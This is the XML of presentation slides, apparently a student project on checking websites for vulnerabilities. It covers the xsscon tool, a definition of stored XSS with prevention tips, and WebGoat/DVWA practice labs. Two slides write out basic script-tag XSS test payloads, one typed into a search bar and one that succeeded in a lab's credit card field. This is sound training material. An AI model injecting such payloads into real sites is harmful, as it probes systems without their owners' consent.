                  <a:lnTo>
                    <a:pt x="13637549" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13706129" y="0"/>
                    <a:pt x="13762008" y="55880"/>
                    <a:pt x="13762008" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13762008" y="834879"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13762008" y="903459"/>
                    <a:pt x="13706129" y="959339"/>
                    <a:pt x="13637549" y="959339"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1665373" y="279035"/>
            <a:ext cx="14119481" cy="1215740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11038633" cy="950467"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11038633" cy="950467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="950467" w="11038633">
                  <a:moveTo>
                    <a:pt x="10914173" y="950467"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="950467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="950467"/>
                    <a:pt x="0" y="894587"/>
                    <a:pt x="0" y="826007"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10914173" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10982753" y="0"/>
                    <a:pt x="11038633" y="55880"/>
                    <a:pt x="11038633" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11038633" y="826007"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11038633" y="894587"/>
                    <a:pt x="10982753" y="950467"/>
                    <a:pt x="10914173" y="950467"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 7" id="7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="391" r="0" b="391"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="287898" y="1494775"/>
            <a:ext cx="10320058" cy="4927629"/>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6550062" y="3653662"/>
            <a:ext cx="11163304" cy="4918831"/>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286533">
            <a:off x="10630702" y="2103444"/>
            <a:ext cx="1472036" cy="415850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="391730" y="8786494"/>
            <a:ext cx="17842632" cy="9766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After running &lt;script&gt;console.log(5000/3000)&lt;/script&gt; , this script in search bar it has given 1.6 answer in console, that means here xss attack is happening, that we have identified with xsscon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1665373" y="495610"/>
            <a:ext cx="13961731" cy="779781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6369"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4549">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Tools used for Vulnerability check of a website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11777555" y="2410331"/>
            <a:ext cx="6321755" cy="9766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Webportal for checking vulnerability with xsscon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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588162" y="7564241"/>
            <a:ext cx="1546969" cy="23784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99" t="3081" r="5729" b="17918"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1474777" y="2635466"/>
            <a:ext cx="15161773" cy="6979079"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5420212" cy="2494965"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="5420212" cy="2494965"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2494965" w="5420212">
                  <a:moveTo>
                    <a:pt x="5295752" y="2494965"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="2494965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="2494965"/>
                    <a:pt x="0" y="2439085"/>
                    <a:pt x="0" y="2370505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5295752" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5364332" y="0"/>
                    <a:pt x="5420212" y="55880"/>
                    <a:pt x="5420212" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5420212" y="2370505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5420212" y="2439085"/>
                    <a:pt x="5364332" y="2494965"/>
                    <a:pt x="5295752" y="2494965"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="62745"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1474777" y="1009650"/>
            <a:ext cx="14893360" cy="1238223"/>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Stored Cross-site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1887853" y="3228263"/>
            <a:ext cx="14335622" cy="5669661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="5652"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>Stored XSS is a type of security vulnerability found in web applications where an attacker injects malicious code into a web page that is then stored on the server and served to all users who view that page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="5652"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>The injected code can steal sensitive information or take control of the user's session. To prevent Stored XSS, web developers should always sanitize and validate user input and use web application firewalls and Content Security Policy (CSP).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99" t="3081" r="5729" b="17918"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="352090" y="401467"/>
            <a:ext cx="17613356" cy="9478238"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12620302" cy="6791337"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="12620303" cy="6791337"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="6791337" w="12620303">
                  <a:moveTo>
                    <a:pt x="12495842" y="6791337"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="6791337"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="6791337"/>
                    <a:pt x="0" y="6735457"/>
                    <a:pt x="0" y="6666877"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12495843" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12564422" y="0"/>
                    <a:pt x="12620303" y="55880"/>
                    <a:pt x="12620303" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12620303" y="6666877"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12620303" y="6735457"/>
                    <a:pt x="12564422" y="6791337"/>
                    <a:pt x="12495843" y="6791337"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="78824"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 5" id="5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="667797" y="1724412"/>
            <a:ext cx="16897463" cy="5407188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4119059" y="826888"/>
            <a:ext cx="10049881" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4834"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4028">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>WEB GOAT Platform same as DVWA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="514350" y="7786369"/>
            <a:ext cx="17259300" cy="14719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Web Goat platform same as DVWA where we can explore different type of injections and can practice simple xss attacks and many more, in that way we have identfied interesting manual vulnerbility check in webgoat, lets explore...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99" t="3081" r="5729" b="17918"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="352090" y="401467"/>
            <a:ext cx="17613356" cy="9478238"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12620302" cy="6791337"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="12620303" cy="6791337"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="6791337" w="12620303">
                  <a:moveTo>
                    <a:pt x="12495842" y="6791337"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="6791337"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="6791337"/>
                    <a:pt x="0" y="6735457"/>
                    <a:pt x="0" y="6666877"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12495843" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12564422" y="0"/>
                    <a:pt x="12620303" y="55880"/>
                    <a:pt x="12620303" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12620303" y="6666877"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12620303" y="6735457"/>
                    <a:pt x="12564422" y="6791337"/>
                    <a:pt x="12495843" y="6791337"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="78824"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 5" id="5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="528879" y="1436488"/>
            <a:ext cx="5699274" cy="393864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4688093" y="3120517"/>
            <a:ext cx="13084230" cy="5045606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4119059" y="826888"/>
            <a:ext cx="10049881" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4834"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4028">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>WEB GOAT Platform same as DVWA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="529118" y="8407774"/>
            <a:ext cx="17259300" cy="14719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The above figure contains webgoat practice lab, in that we need to find where an xss attack can happens in input bar, so by using different xss attacks we can identify vulnerable input box</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99" t="3081" r="5729" b="17918"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="352090" y="401467"/>
            <a:ext cx="17613356" cy="9478238"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12620302" cy="6791337"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="12620303" cy="6791337"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="6791337" w="12620303">
                  <a:moveTo>
                    <a:pt x="12495842" y="6791337"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="6791337"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="6791337"/>
                    <a:pt x="0" y="6735457"/>
                    <a:pt x="0" y="6666877"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12495843" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12564422" y="0"/>
                    <a:pt x="12620303" y="55880"/>
                    <a:pt x="12620303" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12620303" y="6666877"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12620303" y="6735457"/>
                    <a:pt x="12564422" y="6791337"/>
                    <a:pt x="12495843" y="6791337"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="78824"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 5" id="5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="529118" y="1436488"/>
            <a:ext cx="12101795" cy="349804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5924856" y="4980592"/>
            <a:ext cx="11637366" cy="3484333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4119059" y="826888"/>
            <a:ext cx="10049881" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4834"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4028">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>WEB GOAT Platform same as DVWA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="529118" y="8407774"/>
            <a:ext cx="17259300" cy="1471931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3919"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2799">
                <a:solidFill>
                  <a:srgbClr val="FFD659"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>We have checked with &lt;script&gt;alert("hi");&lt;/script&gt; in different input box but it given warn that we are attempting xss attack on site, but on credit card number input box, xss attack happened successful, so in this way we can check xss vulnerability manually.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99" t="3081" r="5729" b="17918"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="337322" y="646172"/>
            <a:ext cx="17526430" cy="1536046"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23368574" cy="2048062"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 4" id="4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="23368574" cy="2048062"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="12558019" cy="1100606"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="Freeform 5" id="5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="false" flipV="false">
                <a:off x="0" y="0"/>
                <a:ext cx="12558019" cy="1100606"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect r="r" b="b" t="t" l="l"/>
                <a:pathLst>
                  <a:path h="1100606" w="12558019">
                    <a:moveTo>
                      <a:pt x="12433559" y="1100606"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="124460" y="1100606"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="55880" y="1100606"/>
                      <a:pt x="0" y="1044726"/>
                      <a:pt x="0" y="976146"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="124460"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="55880"/>
                      <a:pt x="55880" y="0"/>
                      <a:pt x="124460" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="12433559" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12502139" y="0"/>
                      <a:pt x="12558019" y="55880"/>
                      <a:pt x="12558019" y="124460"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="12558019" y="976146"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12558019" y="1044726"/>
                      <a:pt x="12502139" y="1100606"/>
                      <a:pt x="12433559" y="1100606"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="4A83A1">
                  <a:alpha val="78824"/>
                </a:srgbClr>
